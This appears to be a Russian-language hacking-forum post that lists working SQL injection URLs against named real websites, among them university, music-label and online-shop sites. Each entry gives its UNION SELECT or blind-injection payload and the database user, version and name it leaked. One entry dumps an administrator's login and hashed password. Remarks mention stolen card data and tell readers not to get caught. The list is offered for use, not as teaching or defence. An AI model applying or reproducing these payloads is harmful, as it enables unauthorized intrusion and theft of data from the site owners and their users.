Code: http://www.cqgrd.gatech.edu/story.php?id=-1166+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96-- User: [email protected] Version: 5.0.77 Database: dynabot2 Google PR:5 Code: http://widestream.sourceforge.net/blog.php?c=-22+UNION+SELECT+1,2,3,4,5,6,7-- User: [email protected] Version: 5.0.51a Database: w231599_widestream Code: http://supervegan.com/blog/archive.php?a=16+UNION+SELECT+1,2,3,4,5,6-- User: superveg_vegan@localhost Version: 5.0.90 Database: superveg_vegan Google PR:6 Code: http://press.georgetown.edu/p.php?id=4+UNION+SELECT+1,2,3,4,5,6,7,8,9-- User: gupadmin@localhost Version: 4.1.22 Database: georgetown Google PR:6
Code: http://www.sonymusic.co.id/album81.php?id=-867+UNION%20SELECT%201,2,3,concat_ws(0x3a%20,user(),database(),version()),5,6,7,8,9,10,11,12-- User: t58925_sm@localhost Version: t58925_sonymusic Database: 5.0.51a-24+lenny3
Видимо используется какой-то префикс, подобрать названия таблиц/найти админку не смог( http://www.smithy.com/products.php?cid=-1%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12%20limit%200,1%20-- version: 4.1.22 user: cart@localhost database: shoppingcart
Code: http://www.job-mariel.ru/rabota.php?lev=1&id=480000000000+UNION+SELECT+1,2,3,concat_ws(0x3a%20,user(),database(),version())-- User: firebull_job@localhost Version: 5.0.90-community Database: firebull_job
Code: http://math.arizona.edu/weeklynews/poster.html?id=-5806')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database()),15,16,17,18,19,20,21,22,23,24+--+ User: weeklynews@localhost Use passwd: No Version: 5.0.51a-24+lenny3-log Database: events
Code: http://www.creativetalentnetwork.com/resume.php?id=2290000000+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a%20,user(),database(),version()),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53-- User: [email protected] Version: 4.0.27-max-log Database: db132417652
Code: http://www.torg.spb.ru/modul.php?idm=44100000000+UNION+SELECT+1,concat_ws(0x3a%20,user(),database(),version()),3,4-- User: delinform@localhost Version: 4.0.27-log Database: delinform Google PR: 4
http://modules.t-o-m-e.net/module.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,%20version(),user(),database()),11,12,13 User : darkgod@localhost Database : darkdb Version : 5.0.87
http://www.muziekcentrum.be/news.php?ID=-2177+union+select+1,2,3,4,5,6,7,8,9,10-- user() : usrmcv@localhost version() : 5.1.43-0.dotdeb.0 database() : fmcr OS : Debian есть таблица "doc_users" http://www.muziekcentrum.be/doc/ ----------------------------------------------------- http://www.ethical-perspectives.be/page.php?LAN=E&FILE=ep_detail&ID=91&TID=-470+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- user() : [email protected] version() : 4.1.21-log database() : oce OS: Linux ---------------------------------------------------------- http://www.fytobell.be/newsitem_show.php?item=-120+union+select+1,2,3,4,5,6,7,8,9,10 user() : hy_fytows@localhost version() : 4.1.22-community-nt database() : db_fytows OS: Windows
http://gamekey24.de/sites/site.php?site=products&cat=24+AND+substring%28version%28%29,1,1%29=3 3'тя версия MySQL.. картон тоже есть..
Code: http://www.tstn.ru/news.htm?id=-14521+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- version:4.0.26 user:dmitry@localhost database:abc os : portbld-freebsd5.4
Code: http://www.dreyblatt.de/html/resume.php?id=7100000000+UNION+SELECT+1,2,concat_ws(0x3a%20,user(),database(),version()),4,5-- User: [email protected] Version: 4.1.22-max-log Database: d005b4d7 Google PR: 5
Code: http://www.astrotime.ru/press.php?cid=-2+and+1=2+union+all+select+concat_ws(0x3a,version(),user(),database(),@@version_compile_os)-- version:5.0.67-log user:[email protected] database:u55884 os : unknown-freebsd6.2
Жесткие парни наладили поставки просто везде но как какого товара нету -) http://siax.ru/index.php?product_slug=-msi-k9n-neo-f-v2-socket-am2-nforce-520-4ddr2-pci-e-sata-raid-ac97-8ch-giglan-atx&productID=3521 OR productID=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=107,1,(SELECT 1 UNION SELECT 2))--&ukey=discuss_product =k http://siax.ru/index.php?product_slug=-msi-k9n-neo-f-v2-socket-am2-nforce-520-4ddr2-pci-e-sata-raid-ac97-8ch-giglan-atx&productID=3521 OR productID=IF(ASCII(SUBSTRING((SELECT USER()),2,1))>=97,1,(SELECT 1 UNION SELECT 2))--&ukey=discuss_product =a И все остальные по этой же структуре. http://technobutik.ru http://electro-mir.ru http://technocontinent.ru http://fotobuy.ru http://digital-box.ru http://siax.ru http://mgs-group.ru http://icomputers.ru http://mcpc.ru http://ebuyers.ru Не попадайтесь -) Сори если не в тему.
http://www.osf.ro/ro/program.php?program=-10+union+select+1,2,3,4,5,6 user() : site2007@localhost version() : 5.0.51a-3ubuntu5.5 database() : site2007 OS : Humanity to others
http://www.istyle.ro/i_category.php?id=-9471+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user user() : [email protected] version() : 4.1.22-log database() : sql_applestore_mg OS : apple-darwin8.0
Code: http://www.profit-travel.ru/news.php?news_id=14000000+UNION+SELECT+1,concat_ws(0x3a%20,user(),database(),version()),3,4-- User: [email protected] Version: profit_db Database: 4.1.22-log
Code: http://www.traffictechnologytoday.com/news.php?NewsID=3+UNION+SELECT+1,2,3,concat_ws(0x3a,admin,admin_pw,admin_fullname,admin_email),5,6,7,8,9,10+from+passenger_ads.phpads_config-- Database Version: 5.0.45-log Database name: passenger User name: [email protected] admin:admin_pw:admin_fullname:admin_email: pa553ng02:Hash:UKIP Administrator:[email protected]:
